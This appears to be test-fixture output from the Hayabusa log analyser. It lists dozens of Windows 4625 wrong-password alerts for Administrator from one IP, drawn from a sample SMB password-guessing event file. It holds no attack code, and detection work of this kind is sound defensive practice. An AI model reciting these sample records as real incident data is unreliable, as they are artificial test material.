+2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
